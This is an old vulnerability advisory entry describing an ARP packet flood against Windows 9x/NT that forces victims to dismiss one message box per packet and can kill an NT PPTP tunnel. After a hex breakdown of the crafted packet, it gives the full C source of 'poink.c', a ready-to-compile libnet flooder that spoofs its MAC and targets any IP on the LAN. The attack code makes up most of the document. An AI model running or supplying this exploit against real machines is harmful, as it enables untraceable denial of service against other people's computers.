COMMAND
ARP
SYSTEMS AFFECTED
Windows9X, NT
PROBLEM
Joel Jacobson found following. He found found a problem in
Windows9X/NT's way of handeling ARP packets. If you flood a
computer at your LAN with the packet below, it's user will be
forced to click a messagebox's OK button x times, where x is the
number of packets you flooded with. There is no way to trace the
flooder since the MAC address in the packet can be modified to
anything. Bad configurated routers will not drop this packet.
When tested this problem on LAN one could flood a computer on
another C-net at tested LAN without problems. The program NetXRay
was used to preform the flood. The victims had to reboot their
computer, or choose to click _very_ many OK buttons. The ARP
packet is build up like this:
Ethernet Version II:
Address: XX-XX-XX-XX-XX-XX --->FF-FF-FF-FF-FF-FF
Ehternet II Protocol Type: ARP
Address Resolution Protocol:
Hardware Type: 1 (Ethernet)
Protocol Type: 800
Hardware Address: Length: 6
Protocol Address: Length: 4
Operations: ARP Request
Source Hardware Address: XX-XX-XX-XX-XX-XX
IP Source Address: <victim computer's IP>
Destination Hardware Address: XX-XX-XX-XX-XX-XX
IP Destination Address: <victim computer's IP>
And in HEX the packet look like this:
ff ff ff ff ff ff 00 00 00 00 00 00 08 06 08 00 06 04 00 01 00 00 00
00 00 00 XX XX XX XX 00 00 00 00 00 00 XX XX XX XX
(XX is what matters here)
XX XX XX XX is the victim's IP Address, in HEX. For example, if
you want to flood IP 192.168.0.1 at your network you would enter
this hex value: C0 A8 00 01. Here's exploit (kills the MS PPTP
tunnel on NT WKS SP4 (PPTP client)):
/*
* $Id$
*
* poink.c - NT/9x DOS attack
*
* Code:
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* route|daemon9 <route@infonexus.com>
* All rights reserved.
*
* Original Idea:
* Joel Jacobson (joel@mobila.cx)
*
* This simple exploit was written as per the specification from Joel
* Jacobson's bugtraq post (http://geek-girl.com/bugtraq/1999_1/1299.html).
*
* Needs libnet 0.99.
* Currently: http://lazy.accessus.net/~route/libnet
* Soon: http://www.packetfactory.net/
*
* gcc poink.c -o poink -lnet
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#include <libnet.h>
u_char enet_src[6] = {0x00, 0x0d, 0x0e, 0x0a, 0x0d, 0x00};
u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
int send_arp(struct link_int *, u_long, u_char *);
void usage(u_char *);
int
main(int argc, char *argv[])
{
int c, amount;
char errbuf[256];
char *device = NULL;
struct link_int *l;
u_long ip;
amount = 20;
while ((c = getopt(argc, argv, "n:i:")) != EOF)
{
switch (c)
{
case 'i':
device = optarg;
break;
case 'n':
amount = atoi(optarg);
break;
default:
exit(EXIT_FAILURE);
}
}
if (!device)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
if (argc <= optind)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
else if ((ip = libnet_name_resolve(argv[optind], 1)) == -1)
{
fprintf(stderr, "Cannot resolve IP address\n");
exit(EXIT_FAILURE);
}
l = libnet_open_link_interface(device, errbuf);
if (!l)
{
fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf);
exit(EXIT_FAILURE);
}
while (amount--)
{
c = send_arp(l, ip, device);
if (c == -1)
{
/* bail on the first error */
break;
}
}
printf("\n");
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
int
send_arp(struct link_int *l, u_long ip, u_char *device)
{
int n;
u_char *buf;
if (libnet_init_packet(ARP_H + ETH_H, &buf) == -1)
{
perror("libnet_init_packet memory:");
exit(EXIT_FAILURE);
}
/*
* Ethernet header
*/
libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_ARP, NULL, 0, buf);
/*
* ARP header
*/
libnet_build_arp(ARPHRD_ETHER,
ETHERTYPE_IP,
6,
4,
ARPOP_REQUEST,
enet_src,
(u_char *)&ip,
enet_dst,
(u_char *)&ip,
NULL,
0,
buf + ETH_H);
n = libnet_write_link_layer(l, device, buf, ARP_H + ETH_H);
fprintf(stderr, ".");
libnet_destroy_packet(&buf);
return (n);
}
void
usage(u_char *name)
{
fprintf(stderr, "%s -i interface [-n amount] ip\n", name);
}
SOLUTION
Nothing yet.